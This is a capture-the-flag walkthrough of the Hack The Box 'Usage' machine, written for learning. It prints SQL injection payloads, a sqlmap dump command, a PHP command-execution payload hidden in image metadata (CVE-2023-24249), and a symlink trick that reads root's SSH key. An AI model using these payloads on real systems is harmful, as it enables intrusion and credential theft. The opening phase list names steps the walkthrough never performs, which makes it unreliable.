In this Post, Let’s See how to CTF Usage from hackthebox and if you have any doubts, comment down below 👇🏾
Hacking Phases in Usage
Getting into the system initially.Checking open TCP ports using Nmap.Retrieving information from Telnet banners.Looking for vulnerabilities to exploit.Enumerating information through SNMP.Gaining access to a user shell.Obtaining the user flag.Escalating privileges.Using Metasploit for port forwarding.Identifying ways to escalate privileges.Exploiting vulnerabilities like file read to gain access.Obtaining the root flag.
Let’s Begin
Let’s Hack Usage HTB 😌
Port Scanning
rustscan -a 10.129.209.220
[~] Starting Script(s)
[~] Starting Nmap 7.94 ( <https://nmap.org> ) at 2024-04-19 00:27 +07
Initiating Ping Scan at 00:27
Scanning 10.129.209.220 [2 ports]
Completed Ping Scan at 00:27, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:27
Completed Parallel DNS resolution of 1 host. at 00:27, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 00:27
Scanning 10.129.209.220 [2 ports]
Discovered open port 80/tcp on 10.129.209.220
Discovered open port 22/tcp on 10.129.209.220
Completed Connect Scan at 00:27, 0.03s elapsed (2 total ports)
Nmap scan report for 10.129.209.220
Host is up, received conn-refused (0.030s latency).
Scanned at 2024-04-19 00:27:35 +07 for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Web Service
Every time I play web application security, I use Wappalyzer to identify the web application framework or programming language being used to create a challenge.
After I identify the web application framework. I discovered something interesting on HackTricks.
Laravel | HackTricks | HackTricksLearn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert) ! If Laravel is in debugging mode you… book.hacktricks.xyz
User Flag
I removed some of the vulnerabilities I had selected, such as the Debugging mode and Deserialization RCE, because I don’t think they have a method for doing so. SQL Injection is my only option, but where is it?
I spent a whole day trying to find SQL Injection, and at last, I was able to locate it on Reset Password. Here is my payload for testing it.
' ORDER BY 8;-- -
' ORDER BY 9;-- -
I can proof that this service can have been injected because when I attempted to increase the number, I received an error page. Let’s use SQL Map to exploit it!!!
sqlmap -r request -p email --batch --level 5 --risk 3 --dbms=mysql --dbs
I don’t provide an additional payload because I believe you can do it by yourself and know what has to be done as the following step.
After using a password cracking tool to get a password, I use the credentials I received to log in as admin.
I’m sure everyone sees it. The dashboard provides details about the version of dependencies.
After researching into every dependencies vulnerability, I discovered something interesting in encore/laravel-admin: we can ACE
Snyk Vulnerability Database | SnykCritical severity (9.8) Arbitrary Code Execution in encore/laravel-admin | CVE-2023-24249 security.snyk.io
I will upload the payload that shows me, I can reverse shell.
exiftool -Comment="<?php system(\"ping -c 3 10.10.14.28\");?>" payload.jpg
sudo tcpdump -i {interface} icmp
Edit file name to make the file upload 2 extension and waiting to see result of payload, Yummy I can run command!!!
Next step make reverse shell by yourself and you will get user flag
Lateral movement
I looking for how to privilege escalation but I didn’t find anything so I try to list all user on system
cat /etc/passwd | grep /home
I know I need to find Xander’s credentials, but how can I do that? and after that, I found a file that provided Xander’s credentials. (I just type ls -al)
Privilege Escalation
If you’ve played HackTheBox before, it’s simple because the first command we execute when we obtain a user’s password is to verify sudo privilege.
sudo -l
Because this is custom software, so is no way for you to attack it using GTFOBins. However, we can use the strings command to read binary files.
strings /usr/bin/usage_management
I’ve discovered a way to get an answer. The technique is known as Wildcards Spare. (I found about it from HackTricks.)
Wildcards Spare tricks | HackTricks | HackTricksHackTricks Afrikaans – Ht Chinese – Ht Español – Ht Français – Ht German – Ht Greek – Ht Hindi – Ht Italian – Ht… book.hacktricks.xyz
Let’s hacking following the steps that receive from HackTricks
cd /var/www/html
touch @id_rsa
ln -s /root/.ssh/id_rsa id_rsa
You can get the flag in lots of ways. Since it’s really cool to take a screenshot and enter it in as the root user so I read the SSH key to login to the system
Conclusion
Hacking through the Usage HTB machine provides valuable insights into penetration testing techniques, including enumeration, vulnerability exploitation, and privilege escalation. By understanding these steps, aspiring ethical hackers can enhance their skills and contribute positively to the cybersecurity landscape.
FAQs
What is a Usage HTB Writeup?
- A Usage HTB Writeup is a detailed guide on solving the Usage machine challenge on Hack The Box.
What is a Usage Hack The Box Writeup?
- A Usage Hack The Box Writeup explains how to solve the Usage machine challenge.
What is a Usage Hack The Box Walkthrough?
- A Usage Hack The Box Walkthrough is a step-by-step explanation of solving the Usage challenge.
What is a Usage Hack The Box Machine Walkthrough?
- A Usage Hack The Box Machine Walkthrough guides through solving the Usage challenge.
What is a Usage Hack The Box Machine Writeup?
- A Usage Hack The Box Machine Writeup details the steps to solve the Usage challenge.